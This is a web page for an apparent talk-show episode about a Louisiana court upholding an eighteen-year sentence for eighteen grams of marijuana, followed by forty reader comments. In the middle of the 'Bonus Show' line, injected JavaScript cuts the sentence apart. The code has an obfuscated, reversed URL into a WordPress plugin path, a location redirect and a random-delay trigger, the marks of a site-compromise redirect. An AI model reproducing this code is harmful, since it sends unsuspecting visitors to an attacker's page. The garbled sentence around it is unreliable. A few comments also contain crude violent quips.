Judge Denounces Outrageous Marijuana Sentence

–Louisiana Supreme Court Chief Justice Bernette Johnson calls it “outrageous” and “ridiculous” that the state’s highest court upheld an eighteen-year prison sentence of a man convicted of possession of eighteen grams of marijuana

–On the Bonus Show: Russian LGBT faction rescues gay men in Chechnya, Finland’s universal basic income experiment reducing stress, The New York Times asks readers toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ‘say something nice’ about Trump, and much more…

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Broadcast on May 10, 2017

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40 thoughts on “Judge Denounces Outrageous Marijuana Sentence”

  1. Nebu Losa says:

    He shouldn't even be sent to jail. For Pete's sake, making the taxpayer pay 23k a year to keep this guy in jail for 18 years when so many people need better education, food stamps, medical care, etc. This is criminally abusive. It's all about creating more slaves for corporations to benefit.

  2. TheKira699 says:

    It's like the good old police fall back like disorderly conduct, breach of the peace or jaywalking..even when there is no crosswalk in sight. Police jaywalk all the time, you or I would get a ticket.

  3. dreindenver says:

    Make it legal Louisiana. The fight is useless and expensive, and to ruin the life of someone like this is disgusting.

  4. Royal Ace says:

    18 years with no parole for 18 grams of weed? Sounds like something Jeff Session would push for.

  5. Alex says:

    Damn, this is Jean Val Jean

  6. Abnormal Wrench says:

    This would be like getting 18 years for being caught with a case of beer.

  7. Kurwin Saunders says:

    holy fuck. my buddy got caught with 18 lbs and never even got charged. thank god were in Canada.

  8. Takboro Takboro says:

    i live in colorado and 18 grams isnt much at all, when i smoke i go thru about 4 grams a week, but i know other people who could smoke 18 grans in almost no time

  9. TheWondersOfNatureNZ says:

    Ah yeah so the guy was American and not Mexican! Ah yeah so American's do drugs too Donald! LOL. So much for that stupid wall stopping ALL drugs! Hahaha!

  10. Carolina Rojas says:

    Free this man!

  11. Christy T says:

    More time for a little weed than FUCKING RAPISTS SERVE!!!!!

  12. Guy Parris says:

    Amazing why corporations are not flocking to LA to do business.

  13. zena mccarthy says:

    BB IMPACT http://www.fox25boston.com/video?videoId=521774230&videoVersion=1.0

    Let's show these girls we live in a democracy. Racist bigots are not the face of America. Let's lite fires.
    Contacts to the NAACP to act and defend. Make complaints to the school. Anything!! Please.

  14. Just Jax says:

    that's not even a lot if ur selling. 18years? wow.

  15. Damon Beasley says:

    I bet he's not white

  16. Homeboy Chris says:

    The Norway shooter got 20 years.

  17. warpo007 says:

    America makes no sense.

  18. N.W.A. says:

    Well, you can't even get a conviction for a white cop who murders a black man then plants evidence, and all of this is caught on video. That's the "justice" system in America.

  19. Angel Symmetrika says:

    This guy knew he broke the law. When you break the law, there is always the possibility of significant negative sanctions.

  20. TotalBogie says:

    calling it now for the debt and deficit still getting worse in four years. if these guys can't figure out how to save money on low hanging fruit, we're never gonna figure out the big dollars.

  21. Alexandre Frazier says:

    For that price, you may's well murder a prosecutor

  22. bigraviolees says:

    Blankenship killed 29 men in a coal mine and got a spring vacation behind bars

  23. Ailor Pewpew says:

    Taliban shoot people for smoking cigs, USA clearly is a beacon of democracy and human rights and a very civilized country leading the world on crucial issues.


    Should have admitted to sexual assault instead. He would have become president lololol

  25. Lucy Sorenson says:

    The fiscally conservative Republicans wish to save money by sending mostly innocent drug users to jail, which ends up costing thousands of dollars in taxes.

  26. sheshe7 j says:

    how is this not a stranger than usual punishment how is it constitutional for them to put you in jail for a plant

  27. Dragon1717 says:

    Legalize Now!

  28. Mr Organix says:

    100g is 150$ ticket no court nothing here in ohio

  29. James Ward says:

    Mr, Pakman. What evidence is there that charges of resisting arrest is applied to racial minorities in a capricious unwarranted manner? Is it possible that minorities are disproportionately more likely to resist arrest? Do you have some evidence to back up this particular claim? Aside from the aforementioned; I agree with your analysis of the situation in this report. Is the conclusion you've drawn about racial disparities, with respect to charges of resisting arrest, supported by any evidence that isn't subject to a different to a different interpretation?

  30. R Stickle says:

    I used to smoke an ounce a day, while selling 20+ years ago. Started smoking at 14, yet the ONLY trouble it ever cause me was Court related. No health issues just leagle. Never got caght selling just a possession and paraphernalia charge. Still smoking at 51 years old. And my Pentecost Minister had N0 problem with it. He actually saw it as funny. And he was a hard nosed strict when I was younger. Yet as strict as he was had N0 problem with me smoking , he never smoked it he was an alcoholic that quit drinking.

  31. soundcloud says:

    my freind got cought with weed. (posseion of drugs) and hes a minor so he probably gonna get probation. but what do you guys think im sorta scared for him and im just guessing hes gonna get porbation what do you think

  32. yzeew w says:

    Can we call somewhere to complain?

  33. COOKIE says:

    You have a crazy country

  34. CultOfWeirdness says:

    a half ounce and a few grams. that's all he had

  35. Olivier Callec says:

    The force is strong with the prison industry in the US.

  36. Ravi B. says:

    If weed is illegal, so should alcohol and smoking. Damn judge is brainwashed by republicans on weed.

  37. Piotr Zagórski says:

    The only country belonging to Western world, with such judgments.

  38. Charles Johnson says:

    There's really something bizarre to investigate with the murderer of those 2 Boston Anesthesiologist by B. Teixeira. He robbed 2 banks 2014 and 2016 and got short time and was able to keep his green card and not be deported. Beyond weird………

  39. Freedom BS says:

    Jesus said 1st Commandment Thou Shalt Not Smoke Marijuana

  40. dead memories says:

    I feel so sorry for that guy. Ugh our justice system is broken.

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